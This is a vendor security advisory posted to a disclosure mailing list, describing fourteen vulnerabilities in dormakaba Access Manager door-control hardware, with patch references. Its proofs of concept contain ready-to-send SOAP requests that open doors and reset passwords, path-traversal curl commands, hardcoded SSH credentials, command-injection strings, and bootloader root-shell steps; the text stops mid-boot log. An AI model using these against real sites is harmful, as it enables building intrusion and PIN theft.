| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <ca7b04c0-83cc-4d45-9729-fe93623d1332@sec-consult.com>
Date: Mon, 26 Jan 2026 10:21:48 +0000
From: SEC Consult Vulnerability Lab via Fulldisclosure
<fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] SEC Consult SA-20260126-1 :: Multiple Critical Vulnerabilities
in dormakaba Access Manager
SEC Consult Vulnerability Lab Security Advisory < 20260126-1 >
=======================================================================
title: Multiple Critical Vulnerabilities
product: dormakaba Access Manager
vulnerable version: Multiple firmware and hardware revisions (details below)
fixed version: Multiple firmware and hardware revisions (details below)
CVE number: CVE-2025-59097, CVE-2025-59098, CVE-2025-59099,
CVE-2025-59100, CVE-2025-59101, CVE-2025-59102,
CVE-2025-59103, CVE-2025-59104, CVE-2025-59105,
CVE-2025-59106, CVE-2025-59107, CVE-2025-59108
impact: critical
homepage:https://www.dormakaba.com/
found: 2024-03-18
by: Clemens Stockenreitner (Office Vienna)
Werner Schober (Office Vienna)
Supported by the HW Lab Vienna
SEC Consult Vulnerability Lab
An integrated part of SEC Consult, an Atos business
Europe | Asia
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"The Kaba exos 9300 basic system is the cornerstone of your access
management solution. Use it to resolves all your basic employees,
system, user and peripheral management tasks and initiate targeted
security measures as required. [...] "
Source:https://www.dormakaba.com/gb-en/offering/products/electronic-access-data/corporate-access-control-solutions/dormakaba-exos-9300-base-system--ka_500000
Business recommendation:
------------------------
The vendor provides multiple patches which should be installed immediately.
More details can be found at the following locations:
- Solution at the end of this advisory
- SEC Consult blog post:https://r.sec-consult.com/dormakaba
- Vendor website / security page:https://www.dormakabagroup.com/en/security-advisories
- Your dormakaba partner
Tested Architecture Overview
-----------------------------------
The tested system is the enterprise grade physical access system from
dormakaba. The tested system consists of the following components:
------------------------------
dormakaba exos 9300
------------------------------
Exos 9300 is a piece of software based on C# running on a central Windows server with
an MSSQL, or Oracle database as central storage.
Exos consists of multiple modules (e.g. basis, employee management, key depot, access,
visitor management, 3rd party management). Exos is used to centrally manage users,
keys, cards as well as the configuration of the access manager. Devices in the
exos environment are addressed using a special addressing scheme. The address scheme
described in the following table is going to be important.
┌────────────────────┬───────────────────────────┬───────────────┬───────────────────────────────────────────┬───────────────────────────┬───────────────────┐
│ I │ 01 │ 00 │ 01 │ 00 │ 00 │
├────────────────────┼───────────────────────────┼───────────────┼───────────────────────────────────────────┼───────────────────────────┼───────────────────┤
│ Port Type │ Communication Hub Address │ Port Address │ Access Hub Address │ 00 = Door Manager │ Datapoint Address │
│ I = Access Manager │ Values: 01-99 │ Values: 00-99 │ Values: 00-99 │ 01 = Access Point │ Values: 00-20 │
│ B = Serial │ │ │ Fixed to 01 for Access Hubs with Ethernet │ 02 = Turnstile │ │
│ C = Modem │ │ │ │ 03 = IO Controller │ │
│ E = Ethernet │ │ │ │ Fixed to 00 in most cases │ │
│ R = remote │ │ │ │ │ │
└────────────────────┴───────────────────────────┴───────────────┴───────────────────────────────────────────┴───────────────────────────┴───────────────────┘
------------------------------
dormakaba Access Manager
------------------------------
The access manager is a component that is configured via exos. The configuration
between exos and access manager is exchanged via a SOAP interface. Per default
the data exchange is unencrypted. Encryption is only available starting with
access manager hardware release K7.
The access manager is a custom piece of hardware with multiple inputs and outputs.
The device offers the following interfaces:
- Digital Inputs
- 3x DC Output Relays
- 2x RS-232
- 1x RS-485 (Used to connect to access manager extension systems e.g. Kaba 9125)
- 1x RJ45
- 1x Micro USB
- 2x Coax (Used to connect registration units e.g. 9001, 9002)
The tested hardware was an access manager 9200-k5 running Windows CE embedded,
and an access manager 9200-k7 running Linux.
------------------------------
dormakaba Registration Unit
------------------------------
dormakaba registration units can be either a Legic/Mifare card reader,
or a PIN pad used to enter a PIN to deactivate alarming systems, or as
an additional authentication.
------------------------------
Electric lock
------------------------------
The lock used for the tested setup is an Assa Abloy/effeff Profix 118. The lock
is simply controlled via a relay contact connected to the Access Manager. As
soon as a user successfully authenticates with a registration unit,
the relay connected to the lock is switched and the door opens.
The system is depicted in the following diagram.
┌─────────┐
│ │
│exos 9300│ ┌──────────┐ ┌──────────┐
│ │ │ Reg Unit │ │ Pin Pad │
└────┬────┘ │ ┌──┐ │ │ x x x │
│ │ │┼┼│ │ │ x x x │
Ethernet──────►│ │ └──┘ │ │ x x x │
│ │ 9001 │ │ 9002 │
┌────┴────┐ └─────┬────┘ └─────┬────┘
│ Access │ │ │
│ Manager ├────────────────────┴─────────────┘
│ 9200 │ ▲
└────┬────┘ │
│ Coax
│
DC Relay───► │
│
┌──┴──┐
│ │
│ │
│ │
│ ─┤◄──────Electric Lock
│ │
│ │
└─────┘
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SOAP API (CVE-2025-59097)
The exos 9300 application can be used to configure access managers (e.g. 9200,
9230 and 9290). The configuration is done in a graphical user interface on the
dormakaba exos server. As soon as the save button is clicked in exos 9300, the
whole configuration is sent to the selected access manager via SOAP. The SOAP
request is sent without any prior authentication or authorization by default.
Though authentication and authorization can be configured using IPsec for 9200-K5
devices and mTLS for 9200-K7 devices, it is not enabled by default and must
therefore be activated with additional steps.
This insecure default allows an attacker with network level access to completely
control the whole environment. An attacker is for example easily able to conduct
the following tasks without prior authentication:
- Re-configure access managers (e.g. remove alarming system requirements)
- Freely re-configure the inputs and outputs - Open all connected doors permanently
- Open all doors for a defined time interval
- Change the admin password
- and many more
Network level access can be gained due to an insufficient network segmentation as well
as missing LAN firewalls. Some devices with an insecure configuration have been
identified to be directly exposed to the internet as well.
Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 06.00
2) Trace Functionality Leaking Sensitive Data (CVE-2025-59098)
The access manager is offering a trace functionality to debug errors and issues
with the device. The trace functionality is implemented as a simple TCP socket.
A tool called TraceClient.exe, provided by dormakaba via the Access Manager web
interface, is used to connect to the socket and receive debug information. The data
is permanently broadcast on the TCP socket. The socket can be accessed without
any authentication or encryption.
The transmitted data is based on the set verbosity level. The verbosity level can be
set using the HTTP(S) endpoint with the service interface password or with the guessable
identifier of the device via the SOAP interface.
The transmitted data contains sensitive data like the Card ID as well as all
button presses on registration units. This allows an attacker with network level
access to retrieve all entered PINs on a registration unit.
Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212
- 92xx-K7: <BAME 05.02.156
3) Unauthenticated Path Traversal (CVE-2025-59099)
The Access Manager is using the open source web server "CompactWebServer" written
in C#. This web server is affected by a path traversal vulnerability, which
allows an attacker to directly access files via simple GET requests without
prior authentication.
Hence, it is possible to retrieve all files stored on the file system, including
the SQLite database Database.sq3, containing badge information and the corresponding
PIN codes. Additionally, when trying to access certain files, the web server crashes
and becomes unreachable for about 60 seconds. This can be abused to continuously send
the request and cause denial of service.
Vulnerable Versions:
- 92xx-K5: <XAMB 04.05.21
- 92xx-K7: <BAME 04.05.16
4) Unauthenticated Access to the SQLite Database (CVE-2025-59100)
The web interface offers a functionality to export the internal SQLite database.
After executing the database export, an automatic download is started and the
device reboots. After rebooting, the exported database is deleted and cannot be
accessed anymore. However, it was noticed that sometimes the device does not reboot
and therefore the exported database is not deleted, or the device reboots and the
export is not deleted for unknown reasons. The path where the database export is
located can be accessed without prior authentication. This leads to the fact that
an attacker might be able to get access to the exported database without prior
authentication. The database includes sensitive data like passwords, card pins,
encrypted Mifare sitekeys and much more.
Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212
5) Insufficient Session Management (CVE-2025-59101)
Instead of typical session tokens or cookies, it is verified on a per-request basis
if the originating IP address has once successfully logged in. As soon as an
authentication request from a certain source IP is successful, the IP address
is handled as authenticated. No other session information is stored. Therefore,
it is possible to spoof the IP address of a logged-in user to gain access to
the Access Manager web interface.
Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212
- 92xx-K7: <BAME 04.07.268
6) Secrets Stored in Plaintext in Database (CVE-2025-59102)
The web server of the Access Manager offers a functionality to download a backup
of the local database stored on the device. This database contains the whole
configuration. This includes encrypted MIFARE keys, card data, user PINs and
much more. The PINs are even stored unencrypted. Combined with the fact that an
attacker can easily get access to the backup functionality by abusing the
session management issue (CVE-2025-59101), or by exploiting the weak default
password (CVE-2025-59108), or by simply setting a new password without prior
authentication via the SOAP API (CVE-2025-59097), it is easily possible to access
the sensitive data on the device.
Vulnerable Versions:
- 92xx-K5: <XAMB 04.06.212
7) Missing Transport Layer Encryption
The services provided by the access managers, the SOAP API, Web UI, as well as
the Trace service are only available via unencrypted HTTP/raw TCP by default.
Depending on the hardware revision, (m)TLS can be enabled. Details can be
found in the following table
┌────────────────────┬────────────────┬───────────────┐
│ Feature │ 9200-k5 │ 9200-k7 │
├────────────────────┼────────────────┼───────────────┤
│ TLS for the Web UI │ Not Supported │ Supported │
│ mTLS for SOAP │ Not Supported │ Supported │
│ Trace Service │ Not Supported │ Not Supported │
└────────────────────┴────────────────┴───────────────┘
Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 06.00 (except Trace)
8) Weak Default Passwords for SSH Access (CVE-2025-59103)
The access manager 9200 in hardware revision K7 is based on Linux instead of
Windows CE embedded in older hardware revisions. In this new hardware revision
it was noticed that an SSH service is exposed on port 22. By analyzing the
firmware of the devices, it was noticed that there are two users with hardcoded
and weak passwords that can be used to access the devices via SSH. The passwords
can be also guessed very easily. The password of at least one user is set to a random
value after the first deployment, with the restriction that the password is only
randomized if the configured date is prior to 2022. Therefore, under certain
circumstances, the passwords are not randomized. For example, if the clock is
never set on the device, the battery of the clock module has been changed,
the Access Manager has been factory reset and has not received a time yet.
Vulnerable Versions:
- 92xx-K7: <BAME 05.01.88
9) Potential Command Injection/Argument Injection
An attacker is able to set special values as a new password to potentially execute
arbitrary commands on the Access Manager. The reason for that is that the password
is piped directly into a command that executes the command printf and passwd in a
shell. The strings are concatenated. This can lead to multiple possible command
or argument injections.
Vulnerable Versions:
- 92xx-K7: <BAME 06.00
10) Unlocked Bootloader (CVE-2025-59104)
With physical access to the device and enough time an attacker is able to solder
test leads to the debug footprint (or use the 6-Pin tag-connect cable). Thus,
the attacker gains access to the bootloader, where the kernel command line can
be changed. An attacker is able to gain a root shell through this vulnerability.
Vulnerable Versions:
- 92xx-K7: <BAME 06.00
11) Unencrypted Flash Storage (CVE-2025-59105)
With physical access to the device and enough time an attacker can desolder
the flash memory, modify it and then reinstall it because of missing encryption.
Thus, essential files, such as "/etc/passwd", as well as stored certificates,
cryptographic keys, stored PINs and so on can be modified and read, in order
to gain SSH root access on the Linux-based K7 model. On the Windows CE based
K5 model, the password for the Access Manager can additionally be read in
plain text from the stored SQLite database.
Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 06.00
12) Web Server Running with Root Privileges (CVE-2025-59106)
The binary serving the web server and executing basically all actions launched
from the Web UI is running with root privileges. This is against the least
privilege principle. If an attacker is able to execute code on the system
via other vulnerabilities it is possible to directly execute commands
with highest privileges.
Vulnerable Versions:
- 92xx-K7: <BAME 06.00
13) Static Firmware Encryption Password (CVE-2025-59107)
Dormakaba provides the software FWServiceTool to update the firmware version of
the Access Managers via the network. The firmware in some instances is provided
in an encrypted ZIP file. Within this tool, the password used to decrypt the ZIP
and extract the firmware is set statically and can be extracted. This password
was valid for multiple observed firmware versions.
Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: All versions on the market
14) Weak Default Password (CVE-2025-59108)
By default, the password for the Access Manager's web interface, is set to 'admin'.
In the tested version changing the password was not enforced.
Vulnerable Versions:
- 92xx-K5: All versions on the market
- 92xx-K7: <BAME 04.07.268
Proof of concept:
-----------------
1) Unauthenticated SOAP API (CVE-2025-59097)
The exos 9300 application has a sub-module called "System Management".
By clicking on the module in exos 9300 the application d9sysdef.exe
is launched. This sub-application is used to configure the different
devices in the exos 9300 environment. After configuring a device in
the GUI, a click on the save button is necessary to push the new config
to the Access Managers. The configuration itself is pushed via a
SOAP API. The SOAP API requests are sent without any prior authentication,
or authorization. This allows an attacker to freely re-configure and
control arbitrary devices. Some exemplary actions that can be conducted
without prior authentication are:
- Releasing locks and opening doors (Permanently, Once, or in a defined timeframe)
- Deactivating input requirements (e.g. Alarming System Inputs)
- Re-configuring the Access Manager web server (Admin password, IP)
- Directly controlling relays on the Access Managers
The only thing an attacker has to know for the request is the device
identifier. As already mentioned there is a proprietary addressing scheme
in use. A sample address of an Access Manager looks as follows:
I010001
A detailed explanation of the address can be found in the following figure. It
is important to note that an attacker can easily guess those values as the
numbers are simply counted up by one for every new Access Manager and most of
the values are fixed anyways.
┌────────────────────┬───────────────────────────┬───────────────┬───────────────────────────────────────────┐
│ I │ 01 │ 00 │ 01 │
├────────────────────┼───────────────────────────┼───────────────┼───────────────────────────────────────────│
│ Port Type │ Communication Hub Address │ Port Address │ Access Hub Address │
│ I = Access Manager │ Values: 01-99 │ Values: 00-99 │ Values: 00-99 │
│ B = Serial │ │ │ Fixed to 01 for Access Hubs with Ethernet │
│ C = Modem │ │ │ │
│ E = Ethernet │ │ │ │
│ R = remote │ │ │ │
└────────────────────┴───────────────────────────┴───────────────┴───────────────────────────────────────────┘
The API is reachable via the following URL:
http://<Access Manager IP>/ICommunicationHub2IDMMService
The following examples show how to switch a relay to open a door without presenting
a valid card, or PIN as well as an unauthenticated request to change the admin
password without knowing the original one.
Example 1 - Switch Relay to Release Door
By sending the following request to an Access Manager, the "ExecutePassagewayCommand"
with value 1 is sent to the Access Manager which in our case switches relay 1.
This switches the electric lock and opens the secured door.
------Request--------
POST /ICommunicationHub2IDMMService HTTP/1.1
Content-Type: application/soap+xml; charset=utf-8; action="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService/ICommunicationHub2IdmmService/ExecutePassagewayCommand"
Host: <Access Manager IP>:8002
Content-Length: 291
Accept-Encoding: gzip, deflate
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body>
<ExecutePassagewayCommand xmlns="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
<identifier>I010001</identifier>
<datapointId>1</datapointId>
<command>1</command>
</ExecutePassagewayCommand>
</s:Body>
</s:Envelope>
----------------------
The successful response with the result 0 (Success) can be seen in the following
listing.
------Response--------
HTTP/1.1 200 OK
Server: gSOAP/2.7
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 568
Connection: close
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:ns1="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
<SOAP-ENV:Body>
<ns1:ExecutePassagewayCommandResponse>
<ns1:ExecutePassagewayCommandResult>0</ns1:ExecutePassagewayCommandResult>
</ns1:ExecutePassagewayCommandResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
--------------------
Example 2 - Change Password
To change the password of an Access Manager, the following request can be sent
to the server. It is sufficient to simply specify the new password which is set
immediately.
------Request--------
POST /ICommunicationHub2IDMMService HTTP/1.1
Content-Type: application/soap+xml; charset=utf-8; action="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService/ICommunicationHub2IdmmService/BinaryTimezoneUpdate"
Host: <Access Manager IP>:8002
Content-Length: 363
Accept-Encoding: gzip, deflate
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body>
<ParameterUpdate xmlns="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
<identifier>I010007</identifier>
<parameters xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<Parameter>
<Id>9</Id>
<Value>sectest</Value>
</Parameter>
</parameters>
</ParameterUpdate>
</s:Body>
</s:Envelope>
----------------------
The successful response with the result 0 (Success) can be seen in the following
listing.
------Response--------
HTTP/1.1 200 OK
Server: gSOAP/2.7
Content-Type: application/soap+xml; charset=utf-8
Content-Length: 532
Connection: close
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://schemas.microsoft.com/2003/10/Serialization/" xmlns:ns1="http://kbr.kaba.ch/services/ICommunicationHub2IdmmService">
<SOAP-ENV:Body>
<ns1:ParameterUpdateResponse>
<ns1:ParameterUpdateResult>0</ns1:ParameterUpdateResult>
</ns1:ParameterUpdateResponse>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
----------------------
2) Trace Functionality Leaking Sensitive Data (CVE-2025-59098)
The dormakaba Access Manager has an open port (TCP/4502) that is used for debugging
and sending trace data. The socket is normally accessed via an application (TraceTool.exe)
that can be downloaded via the Access Manager web app. The tool is simply connecting
to the TCP socket and displaying the broadcast data. The verbosity of the transmitted
data can be tuned by setting a verbosity level.
The verbosity level is set via the already known SOAP API. The level can either be set
by supplying the known or guessable device identifier, or by sending the password that
has the default value "admin". In the wild we noticed different trace configurations.
Some Access Managers were configured with verbose trace levels, some just with informational.
After connecting to the socket with an arbitrary tool (e.g. telnet, netcat), broadcast
data can be observed.
The data includes debug information data inputs (e.g. the entered PIN), as well as
success (correct PIN, known card) and error messages (unknown card, wrong PIN).
The following excerpt shows the output of the socket after holding a card against the card
reader and entering the PIN 1234 as well as pressing the button "Enter". It can be clearly
observed that the PIN is broadcast to the socket. Furthermore, the success messages
are displayed.
telnet <Access Manager IP> 4502
Trying <Access Manager IP>...
Connected to <Access Manager IP>.
Escape character is '^]'.
(Info)15:53:07.433: TraceSettings.TcpTracing (Port: 4502): Add new Client to Traceoutput: $ClientIP:47434
(Verbose)15:53:08.128: Found 1 txps.
(Verbose)15:53:08.161: TransponderHandling.ReadImpl: Read from current segment with offset 0 11 bytes of data
(Verbose)15:53:08.177: MediaReceive.SendForward: Added record (BadgeMessage, NoError) to mediaQueue
(Verbose)15:53:08.220: MediaReceive.HandleReceivedMedia: Processing now record (BadgeMessage, NoError)
(Verbose)15:53:08.226: ReactionStrategy.GainAdmission: Used record: CardID: 0000000000000000007A
(Verbose)15:53:08.230: +Cardlink.Execute
(Verbose)15:53:08.234: -Cardlink.Execute
(Verbose)15:53:08.240: Reaction.GetCardFromCache took 1 ms. System is offline
(Verbose)15:53:08.244: ReactionStrategy.React: GetPerson returned NoError
(Verbose)15:53:08.253: Reaction.CheckTimezone: Return EnterPincodeIdentification
(Verbose)15:53:08.257: ReactionStrategy.AdmissionReaction: CheckProfile returned EnterPincodeIdentification
(Info)15:53:08.261: Reaction.AdmissionReaction: EnterPincodeIdentification
(Verbose)15:53:08.264: ReactionStrategy.GainAdmissionInternal: AdmissionReaction returned EnterPincodeIdentification
(Verbose)15:53:08.270: React: GainAdmission returned EnterPincodeIdentification
(Verbose)15:53:08.274: React: MsgId is EnterPincodeIdentification
(Info)15:53:08.284: AntComApi.Send: Sending command AccessLedGreen, AccessLedRed, FKey
(Info)15:53:08.693: AntComApi.Send: Sending command FeedbackBuzzer, FeedbackLed, On, KeyPad
(Info)15:53:09.580: AntComApi.GetKey: Key 1 received from InternalRegistrationUnits
(Verbose)15:53:09.586: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:09.929: AntComApi.GetKey: Key 2 received from InternalRegistrationUnits
(Verbose)15:53:09.936: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:10.446: AntComApi.GetKey: Key 3 received from InternalRegistrationUnits
(Verbose)15:53:10.452: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:10.795: AntComApi.GetKey: Key 4 received from InternalRegistrationUnits
(Verbose)15:53:10.801: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Info)15:53:11.397: AntComApi.GetKey: Key E received from InternalRegistrationUnits
(Verbose)15:53:11.403: MediaReceive.HandleReceivedMedia: Processing now record (Keypad, NoError)
(Verbose)15:53:11.413: Reaction.GetCardFromCache took 1 ms. System is offline
(Info)15:53:11.418: Reaction.CheckPincode: AccessGrantedWithPincode
(Verbose)15:53:11.426: React: MsgId is AccessGrantedWithPincode
(Verbose)15:53:11.449: Reaction.GetCardFromCache took 1 ms. System is offline
(Verbose)15:53:11.457: PassagewayCommand.Execute (ReleasePassageCommand)
(Info)15:53:11.469: Passageway.SingleReleaseImmediate: SingleReleasingThisPassageway on deviceId: 2
(Verbose)15:53:11.493: Door.Release
(Info)15:53:11.509: ClearAlarm: DoorOpenAlertEnd
3) Unauthenticated Path Traversal (CVE-2025-59099)
To exploit the path traversal vulnerability, the desired file can be placed directly
in the path of the GET request, prepended with the following string:
../../../../../../../
To download the main Kaba application running on the Access Manager, the following
request can be sent to the device without prior authentication.
curl --path-as-is http://<Access Manager IP>/../../../../../../../windows/Kaba.Idmm.Main.exe --output Kaba.Idmm.Main.exe
The webserver then responds with the full output of the executable.
------Response--------
HTTP/1.1 200 OK
Content-Type: application/vnd.microsoft.portable-executable
Accept-Ranges: bytes
Server: CompactWeb
Connection: close
Content-Length: 59904
Set-Cookie: authorizationID=Access accepted at xx/xx/2024 9:39:56 AM
MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode.
<snip>
----------------------
Additionally, the path traversal vulnerability can be used to gain unauthenticated
access to the SQLite database, containing badge information, corresponding PIN codes,
information about all enrolled employees and the precise device configuration parameters,
including the set admin password in cleartext.
To gain unauthenticated access to the database file, the following request can be sent
to the device.
curl --path-as-is http://<Access Manager IP>/../../../../../../../flash/Database.sq3 --output Database.sq3
The response then includes the full SQLite database.
------Response--------
HTTP/1.1 200 OK
Content-Type: text/html
Accept-Ranges: bytes
Server: CompactWeb
Connection: close
Content-Length: 118784
Set-Cookie: authorizationID=Access accepted at xx/xx/2024 4:04:57 PM
SQLite format 3@ $t^ ,$-æØ3ûöñìçâÝØ?S-indexsqlite_autoindex_BookingEventDefs_1BookingEventDefs
‚2++„tableBinaryTimezonesBinaryTimezonesCREATE TABLE [BinaryTimezones] ( [BinaryProfileId] [int] NOT NULL, [PairPrio]
[tinyint] NOT NULL, [TimeFrom] [smallint] NOT NULL, [TimeTo] [smallint] NOT NULL, [DayFlags] [smallint] NOT NULL, CONSTRAINT
[PKBinaryTimezones] PRIMARY KEY (BinaryProfileId, PairPrio))=Q+indexsqlite_autoindex_BinaryTimezones_1BinaryTimezones
<snip>
----------------------
In some instances requesting certain files via the path traversal vulnerability results
in a denial of service, making the Access Manager's web interface unreachable. This can for
example be triggered by accessing the file ping.exe in the following way.
curl --path-as-is http://<Access Manager IP>/../../../../../../../windows/ping.exe
4) Unauthenticated Access to the SQLite Database (CVE-2025-59100)
To execute the attack, an attacker can simply navigate to the following path:
http://<Access Manager IP>/database/Database.sqlite
If the file exists, it can be downloaded without prior authentication.
5) Insufficient Session Management (CVE-2025-59101)
The issue in the session management can be demonstrated by sending the following request
via curl to log in.
curl http://<Access Manager IP>/login.cgi?password=<passwordhash>
The server then simply responds with "LoggedIn". After successfully logging in from one
certain IP address, it is possible to send all other requests without providing an access
token or cookie value.
6) Secrets Stored in Plaintext in Database (CVE-2025-59102)
The Access Manager offers a functionality to export the local SQLite database. The
database contains the whole configuration of the Access Manager. This includes passwords
for the web app, VPN passwords, card IDs, PINs and much more. The export functionality
can be executed after logging in (e.g. with the default password), or by exploiting the
session management issues.
In general, an attacker has many possibilities to get access to the database.
This includes:
- Weak default password (documented in issue 14)
- Unauthenticated Path traversal (documented in issue 3)
- Issues in the Session Management (documented in issue 5)
- Unencrypted Flash Storage (documented in issue 11)
The following figure shows the downloaded database and the contents of the table "Cards".
❯ sqlite3 ~/research/Database.sq3
Enter ".help" for usage hints.
sqlite> SELECT * from Cards;
+----------------------+--------------+------+--------------+
| CardId | SitekeyIndex | Pin | AccessRights |
+----------------------+--------------+------+--------------+
| 0000000000000000000A | 0 | 1234 | |
| 00000000000000000000 | 0 | 1234 | |
| 00000000000000000006 | 0 | 5678 | |
| 00000000000000000009 | 0 | 9999 | |
| 00000000000000000000 | 0 | 9999 | |
+----------------------+--------------+------+--------------+
7) Missing Transport Layer Encryption
No separate proof of concept has been created. Please review the general
description above.
8) Weak Default Passwords for SSH Access (CVE-2025-59103)
The root password is set using the following functions:
-----------------------------------------------------------------
1 check_etc_shadow() {
2 if [ -f /etc/shadow ] && [ -s /etc/shadow ]; then
3 ROOT_PASSWD_HASH=$(grep root < /etc/shadow | cut -d ':' -f 2)
4 else
5 echo "/etc/shadow missing or empty, creating it ..."
6 touch /etc/shadow
7 # only make it readable for root, as that is the purpose the shadow file was introduced for
8 chmod go-rwx /etc/shadow
9 # restoring default password for update_user
10 echo "update_user:\$1\$ombaQHlp\$jqdDyjpD2PJ.6j74PlwDd0:::::::" > /etc/shadow
11 fi
12
13 if [ -z "$ROOT_PASSWD_HASH" ]; then
14 echo "'/etc/shadow' corrupted! Trying to fix it ..."
15 echo "root:\$5\$:::::::" >> /etc/shadow
16 fi
17 }
18
19 # TODO: This check can be removed in future if it is possible to set the time in Barebox / or we decide we don't need the time to be set
20 check_date() {
21 if [ "$(date +%Y)" -lt "2022" ]; then
22 echo "Date has not been set, will not change root password."
23 exit 1;
24 fi
25 }
26
27 check_etc_shadow
28 check_date
29
30 if [ -n "$ROOT_PASSWD_HASH" ]; then
31 SALT=$(echo "$ROOT_PASSWD_HASH" | cut -d '$' -f 3)
32 EAC_PASSWD_HASH=$(mkpasswd -m sha256 -S "$SALT" eac)
33 fi
34
35 if [ "$EAC_PASSWD_HASH" = "$ROOT_PASSWD_HASH" ] || [ ! -f /opt/dormakaba/jail/fp.txt ]; then
36 echo "Detected standard password or missing fingerprint. Generating new password ..."
37 GENERATED_PASSWORD=$(head -c 32 /dev/urandom | md5sum | head -c 32)
38 # create fingerprint file
39 ENCRYPTED_PASSWORD=$(echo "$GENERATED_PASSWORD" | openssl rsautl -pkcs -encrypt -inkey "$ENCRYPTION_CERT" -pubin | openssl enc -base64)
40 create_fingerprint_file > "$FINGERPRINT_FILE"
41 # change password
42 yes "$GENERATED_PASSWORD" | passwd -a sha256 root
43 else
44 echo "Password will not be changed."
45 fi
-----------------------------------------------------------------
It can clearly be seen that under multiple circumstances the password is not
properly set (e.g. date is lower than 2022 in line 21). Under those circumstances,
which we have observed in the wild, the following users and passwords
are hard-coded and can be used to log into the devices:
root:eac
update_user:secret
9) Potential Command Injection/Argument Injection
The vulnerable code can be seen in the following code listing. The parameter
"newPassword" is controlled by the attacker.
-----------------------------------------------------------------
string newPasswordEscaped = newPassword;
newPasswordEscaped = newPasswordEscaped.Replace("\"", "\\\"");
newPasswordEscaped = newPasswordEscaped.Replace("'", "'\\''");
string args = "-c \"printf '%s\n%s' '" + newPasswordEscaped + "' '" + newPasswordEscaped + "' | passwd update_user\"";
if (!SystemApi.RunSystemProcess("sh", args))
{
TraceSettings.TraceWithErrorLevel("SettingsController.SetPassword: Changing password on platform level failed!");
response.StatusCode = 500;
return false;
}
-----------------------------------------------------------------
During our research we were able to identify multiple cases that can be
potentially exploited:
- Potential Argument Injection
- Potential Command Injection
- DoS
By setting the following password, it was not possible to execute a command,
but we believe with more time and a more detailed look in the shell used,
a successful attack might be possible due to the custom filtering implemented.
\\\"; touch /tmp/test;
Strace output:
[pid 1234] execve("/usr/bin/sh", ["/usr/bin/sh", "-c", "printf '%s%s' '\\;", "touch", "/tmp/test; \\; touch /tmp/test;' | echo 'success'"], 0x55a70daabeef /* 63 vars */) = 0
The following password set via the web UI, results in an argument injection
in the shell (busybox) used.
\\\"; -h;
[pid 1234] execve("/usr/bin/sh", ["/usr/bin/sh", "-c", "printf '%s%s' '\\;", "-h \\; -h' | echo 'success'"], 0x55a70daabeef /* 63 vars */) = 0
10) Unlocked Bootloader (CVE-2025-59104)
An attacker can connect to the debug footprint. The UART has to be configured
for 1.8V, 115200 Baud, 8N1. When starting the Access Manager, the attacker
will read following lines on the UART:
-----------------------------------------------------------------
barebox 2017.09.0-BSP-Yocto-phyBOARD-Segin-dormakaba.17.2 #1 Thu Jan 27 19:40:11 CET 2022
Board: Phytec phyCORE-i.MX6 Ultra Lite SOM
detected i.MX6 UltraLite revision 1.2
[...]
running /env/bin/init...
Hit m for menu or any other key to stop autoboot:
-----------------------------------------------------------------
Pressing any key will now drop the attacker into the barebox bootloader shell.
To mount the nand flash, the attacker can execute the "nand-a" script located
under "/env/boot/nand-a". In order to elevate privileges to a root shell, the attacker
will now modify the kernel command line. This is done by manually setting an
environment variable:
-----------------------------------------------------------------
global.linux.bootargs.dyn.root="system0 console=ttymxc0,115200n8 root=ubi0:root-a ubi.mtd=root rootfstype=ubifs rw POR init=/bin/sh"
-----------------------------------------------------------------
Then, the "bootm" command has to be executed to boot the system.
The device will report:
-----------------------------------------------------------------
Loading ARM Linux zImage '/dev/nand0.root.ubi.kernel-a'
Loading devicetree from '/dev/nand0.root.ubi.oftree-a'
commandline: console=ttymxc0,115200n8 system0 console=ttymxc0,115200n8 root=ubi0:root-a
ubi.mtd=root rootfstype=ubifs rw POR init=/bin/sh
[0.000000] Booting Linux on physical CPU 0x0
[0.000000] Linux version 5.10.76 (jenkins@...5fe09bc8d) (arm-linux-gnueabihf-gcc (Linaro
